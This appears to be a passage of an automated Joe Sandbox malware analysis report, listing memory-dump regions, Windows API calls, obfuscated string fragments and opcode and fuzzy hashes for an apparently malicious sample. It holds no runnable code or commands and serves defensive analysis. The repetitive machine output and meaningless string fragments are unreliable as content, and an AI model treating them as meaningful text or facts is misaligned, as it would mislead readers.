                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 15e120dbccfa0a3467e041f793a894799ab3c108f62deb9284df9cf94b36bcfc
                                                                                • Instruction ID: 4b5d1c38827260ea2180477e03a0e6d8fb7e5ebe6b7cf8e9c6636a75debe1ebb
                                                                                • Opcode Fuzzy Hash: 15e120dbccfa0a3467e041f793a894799ab3c108f62deb9284df9cf94b36bcfc
                                                                                • Instruction Fuzzy Hash: DD017633A557080BC311AE7CDC94A5ABB96EFD9324F2A463CE5D4873D0DA31990A8295
                                                                                APIs
                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 002DCEC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeSecurity
                                                                                • String ID:
                                                                                • API String ID: 640775948-0
                                                                                • Opcode ID: bba83c7bc2e29570d42dadb617c6ad077720f727ebd215811d2d88cdbb0e30ce
                                                                                • Instruction ID: 81b05e3b2329bfad093416ed3e292c15d341b85dfd8d9479e790d528143d3855
                                                                                • Opcode Fuzzy Hash: bba83c7bc2e29570d42dadb617c6ad077720f727ebd215811d2d88cdbb0e30ce
                                                                                • Instruction Fuzzy Hash: 5CD012313E474276F97586489C53F902209870AF64F311B1CB332FE2D1C8D07141850C
                                                                                APIs
                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 002DCE93
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 5d1edb270c73346cbb41981caf55ae163bf079166976dd3f68cdb430e3d50752
                                                                                • Instruction ID: 338c767e8acdfcc0b6d762e02c88631cd56fbf73fb8e0ed356b9f30394d149fe
                                                                                • Opcode Fuzzy Hash: 5d1edb270c73346cbb41981caf55ae163bf079166976dd3f68cdb430e3d50752
                                                                                • Instruction Fuzzy Hash: 94D0232139824477D114736CEC03F57325D870F714F445226F776CA1C2DD51E915C5B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                                                                                • API String ID: 0-1787199350
                                                                                • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                                                                • Instruction ID: 720b444b660ccfbeb33f08b137f221c67681ea795a7f1e73a350528e391608c4
                                                                                • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                                                                • Instruction Fuzzy Hash: 6BB1D47011C3C28FD3158F2980607ABBFE1AF97744F1849ADE4D58B392D779884ADB92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HLWe$HLWe$Pv"_$]~{$bzw$i }
                                                                                • API String ID: 0-3181076253
                                                                                • Opcode ID: b77eb7e629bb34f7cea73b0ccd1a8d51e4ec1af7c1b655203af7275aed697bcd
                                                                                • Instruction ID: db0d224eebdba6df4e9953295fe83859cd77fed8acf96ae607ae2727703e280d
                                                                                • Opcode Fuzzy Hash: b77eb7e629bb34f7cea73b0ccd1a8d51e4ec1af7c1b655203af7275aed697bcd
                                                                                • Instruction Fuzzy Hash: 63B2F8F3A0C2049FE3046E2DEC8567ABBE9EF94720F16493DE6C4C7744EA3598418697
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0ky~$APs_$Eu_]$KN3$qq[>$[f
                                                                                • API String ID: 0-147168859
                                                                                • Opcode ID: e847c0003c3b1b6b9a38b4fb1f4c87fc28381bc117da6d2e40361e56eeb0162e
                                                                                • Instruction ID: 79b5b79f3b9d733b8518e9fe56fc15bd8fed9ac739658eedf15c46189f223f17
                                                                                • Opcode Fuzzy Hash: e847c0003c3b1b6b9a38b4fb1f4c87fc28381bc117da6d2e40361e56eeb0162e
                                                                                • Instruction Fuzzy Hash: 1BB218F360C2049FE304AE2DEC8577ABBE9EF94720F1A893DE6C4C7744E63558058696
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                                                                                • API String ID: 0-3274379026
                                                                                • Opcode ID: 0cc19292394d150de6cbfe37cc4f24e4ad1a5ffd3ca520678977bbf622fff547
                                                                                • Instruction ID: d247e6cd07799a08a42f24d8c8a222e218d9286185a82bcfb41432c48e8e50a6
                                                                                • Opcode Fuzzy Hash: 0cc19292394d150de6cbfe37cc4f24e4ad1a5ffd3ca520678977bbf622fff547
                                                                                • Instruction Fuzzy Hash: F3517B725683918BD320CF26C8902ABB7F2FFC2341F58994DE8C18B355EB748906C782
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,T-$2L-$@O-$bK-$bM-$zQ-
                                                                                • API String ID: 0-1753327461
                                                                                • Opcode ID: b8b58846616c7afa8338cec339af27bba68314efaffa3ee30f567af3a55dfb41
                                                                                • Instruction ID: f5b385fb432104672d26eb5a29f8da147f213672b1c13a1dc7c65e313641dd4a
                                                                                • Opcode Fuzzy Hash: b8b58846616c7afa8338cec339af27bba68314efaffa3ee30f567af3a55dfb41
                                                                                • Instruction Fuzzy Hash: 6B426635618301DFD704CF28D8947AABBE5BF88355F08882DE8998B391D7B5D994CF82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ?Rn$QLM$rC$u,w}
                                                                                • API String ID: 0-1412612535
                                                                                • Opcode ID: 9f99d0e64240c1c09d2d53103e6b031cc4454813e5f9c5c29daa15c0547d9352
                                                                                • Instruction ID: e8e0bc26f79eeeec34990d1959fe2bc5c2cf0bd29ad628eaf03f86777c0969eb
                                                                                • Opcode Fuzzy Hash: 9f99d0e64240c1c09d2d53103e6b031cc4454813e5f9c5c29daa15c0547d9352
                                                                                • Instruction Fuzzy Hash: 93B205F36082049FE304AE2DEC4567ABBE9EFD4720F1A493DE6C4C7744EA7598018796
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !r>{$R^n$^]oV$lkJ7
                                                                                • API String ID: 0-4239331435
                                                                                • Opcode ID: ef9c5296daf2b8c2120e0eb70926189e00ceb09e0d743d02f31075f2c465ad93
                                                                                • Instruction ID: fd8f2b96228fc2a6fa3abc8268e7aa552689f9a887666f7a4612aa8b9ede8865
                                                                                • Opcode Fuzzy Hash: ef9c5296daf2b8c2120e0eb70926189e00ceb09e0d743d02f31075f2c465ad93
                                                                                • Instruction Fuzzy Hash: E1B205B360C2109FE704AE2DEC8567ABBE5EF94720F1A493DEAC5C3344EA3558058797
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2gSa$S~c$m8o`$wWc[
                                                                                • API String ID: 0-3991578414
                                                                                • Opcode ID: 61d7cb8396d033bc2d58f4c4bc19672a7f62d21fdf37a058507874f90e48d3dd
                                                                                • Instruction ID: e08d8c2d4d18d26839ee3429b5a0affda635e0e4e996720db3b85f2539e4ef5f
                                                                                • Opcode Fuzzy Hash: 61d7cb8396d033bc2d58f4c4bc19672a7f62d21fdf37a058507874f90e48d3dd
                                                                                • Instruction Fuzzy Hash: 95B204F3A082049FE304AE2DEC4577ABBE5EF94720F1A493DEAC483744EA3558058797
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: )=+4$57$7514$84*6$N
                                                                                • API String ID: 0-4020838272
                                                                                • Opcode ID: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                                                                • Instruction ID: 251d7082a1ebbe9b1de97b99b2f4be05517480e1c96ffc925ca8f4446bba9f29
                                                                                • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                                                                • Instruction Fuzzy Hash: 6C71B16511C3C28BD315CF2984A037BFFE1AFA2305F1849AEE4D64B382D779895AC752
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +2/?$=79$BBSH$GZE^
                                                                                • API String ID: 0-3392023846
                                                                                • Opcode ID: 678380eae3587fb1f4d46e1929a45db0a12fd0c4f5ecb30918b968163f25d547
                                                                                • Instruction ID: 9da7a98c9af3b4f1f3d7b7bbf4eb15e92fbd918d633b8f55bc6b973b31c6168d
                                                                                • Opcode Fuzzy Hash: 678380eae3587fb1f4d46e1929a45db0a12fd0c4f5ecb30918b968163f25d547
                                                                                • Instruction Fuzzy Hash: 50521170514B828FC735CF39C890666FBE2BF56314F148A6DC5E68BB92CB35A816CB50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
